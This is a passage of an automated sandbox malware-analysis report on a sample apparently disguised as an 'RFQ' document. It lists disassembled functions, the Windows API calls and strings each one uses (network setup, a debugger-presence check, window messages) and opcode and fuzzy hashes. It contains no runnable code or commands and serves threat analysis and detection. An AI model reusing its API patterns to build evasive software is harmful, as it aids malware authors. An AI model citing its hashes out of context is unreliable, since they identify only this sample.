                    • Opcode Fuzzy Hash: 3a3b7cab45234a7401965f4a4c35208b374b4082c37554e9436fd9885280a8e5
                    • Instruction Fuzzy Hash: 7F11BE31E01118AFCB21DB98DC44BA973BAEB25318F0450AAEE44F73A0D7B0AD069791
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EE2520
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EE2549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: f6fef275da535160833f346fc8be4a2eca0b26046cf273305082f704777517db
                    • Instruction ID: 566e9e8ecb35d84c02a7563ac01709dab19266d304667bd88a25130ea220a206
                    • Opcode Fuzzy Hash: f6fef275da535160833f346fc8be4a2eca0b26046cf273305082f704777517db
                    • Instruction Fuzzy Hash: 5311E370501669BEDB248F538C94EFBFF6CFF05355F10912EF60566040D2705948DAE1
                    APIs
                      • Part of subcall function 00EE830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00EE80C8,?,00000000,?,?), ref: 00EE8322
                    • inet_addr.WSOCK32(00000000), ref: 00EE80CB
                    • htons.WSOCK32(00000000), ref: 00EE8108
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidehtonsinet_addr
                    • String ID: 255.255.255.255
                    • API String ID: 2496851823-2422070025
                    • Opcode ID: 440eec9577253bc7a9d13255b2d429ea0d398f0150d4d84f7ff85875939093cf
                    • Instruction ID: 0f25d439ca8f236bdcb1a6a67f35ce6691bd4815d92d9a0fde81af243d91fdb2
                    • Opcode Fuzzy Hash: 440eec9577253bc7a9d13255b2d429ea0d398f0150d4d84f7ff85875939093cf
                    • Instruction Fuzzy Hash: BD112130200249ABDB20AF65CD92FFEB364FF00320F10952BE919B72C2CA72A805C691
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EC9355
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: efc7a50bf31d676eeecb1b331107f2fe95a7c9456537b17f23f4ea0b3aaef77d
                    • Instruction ID: eda28815d3c456c2c631137ca55938997f5b324440f5fe31abfd5df1856bb11b
                    • Opcode Fuzzy Hash: efc7a50bf31d676eeecb1b331107f2fe95a7c9456537b17f23f4ea0b3aaef77d
                    • Instruction Fuzzy Hash: 6E014131A04214ABCB08EBA4CC82DFE73A8FF02320B142A1DF836772C2DB32580CC251
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00EC924D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 9aad6fb609b4529043c5206580fc6072b81418aec040dc691c63ad92315084ef
                    • Instruction ID: d2a78b9b060069c48d6eb57594ed2b0beebb4542c3ab4a9925ad02cbaa3f6e53
                    • Opcode Fuzzy Hash: 9aad6fb609b4529043c5206580fc6072b81418aec040dc691c63ad92315084ef
                    • Instruction Fuzzy Hash: 0201D871B41104BBCB18E7A0DA97EFF73E8DF05300F141019B95673192EA515F0D9262
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00EC92D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 9f5236ff90ce3d07491db8c9c530133a70d0bb2fd59a9c42d65b4527d271dc69
                    • Instruction ID: 774fcfefd115aabe7ccf93adfced9bd64e539d14a0a1dae58d8fd01e4474e9e7
                    • Opcode Fuzzy Hash: 9f5236ff90ce3d07491db8c9c530133a70d0bb2fd59a9c42d65b4527d271dc69
                    • Instruction Fuzzy Hash: 5101A772A4510477CB18E6A0DA87EFF77EC9F11300F246119B85673192DA525F0D9272
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: 39b0c138df0cc53d32bda067fd43bc559f264a03e4efdc43f16d75e7a23318c6
                    • Instruction ID: 7e215e0072ce593a6c3d4f73fd19735cc5712508706492544e3214a389bdb52a
                    • Opcode Fuzzy Hash: 39b0c138df0cc53d32bda067fd43bc559f264a03e4efdc43f16d75e7a23318c6
                    • Instruction Fuzzy Hash: 86E09B7250432D5BD720AA99AC45AA7F7ACEB45771F000157F914E3150D560994587D1
                    APIs
                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00EC81CA
                      • Part of subcall function 00E93598: _doexit.LIBCMT ref: 00E935A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Message_doexit
                    • String ID: AutoIt$Error allocating memory.
                    • API String ID: 1993061046-4017498283
                    • Opcode ID: 859177108b15bb82a4f9e688ff0a62f9e2fdc008d65b4c2e3cf98fd4e559d537
                    • Instruction ID: e9eabe7a518316a1fa04a605c791a4bfbf84cc151ee41289832b74995047b759
                    • Opcode Fuzzy Hash: 859177108b15bb82a4f9e688ff0a62f9e2fdc008d65b4c2e3cf98fd4e559d537
                    • Instruction Fuzzy Hash: 1ED012323C531836D61432A56D06FC576C84B05B55F549015BB08B55D38ED6D98292DE
                    APIs
                      • Part of subcall function 00EAB564: _memset.LIBCMT ref: 00EAB571
                      • Part of subcall function 00E90B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00EAB540,?,?,?,00E7100A), ref: 00E90B89
                    • IsDebuggerPresent.KERNEL32(?,?,?,00E7100A), ref: 00EAB544
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E7100A), ref: 00EAB553
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EAB54E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: a8ca204651c4726d77a7ec6e0baadfd8959b9f4a646115f3a47e3c72435874c9
                    • Instruction ID: 26bb2b720dde5b6a93a2eb7a3209c4fa92a34538d06b15c6b22f0ed81587be77
                    • Opcode Fuzzy Hash: a8ca204651c4726d77a7ec6e0baadfd8959b9f4a646115f3a47e3c72435874c9
                    • Instruction Fuzzy Hash: 4EE09270600310CFD760DF69E4043827BE4AF04714F04C96CE486E7362EBB4E448CB61
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EF5BF5
                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EF5C08
                      • Part of subcall function 00ED54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED555E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: 6f3dcbf021b500f03856540ff37e4c497780c12d16ce990deb1909e32c479dd7
                    • Instruction ID: 572c284a5cb40fa9d1c3e67d526b74d91ccbc41531b050f7abd80919048ab655
                    • Opcode Fuzzy Hash: 6f3dcbf021b500f03856540ff37e4c497780c12d16ce990deb1909e32c479dd7
                    • Instruction Fuzzy Hash: ADD0C932388311BBE774AB71AC1BFA76A54AF40B61F110825B656BA2D0D9E49805C651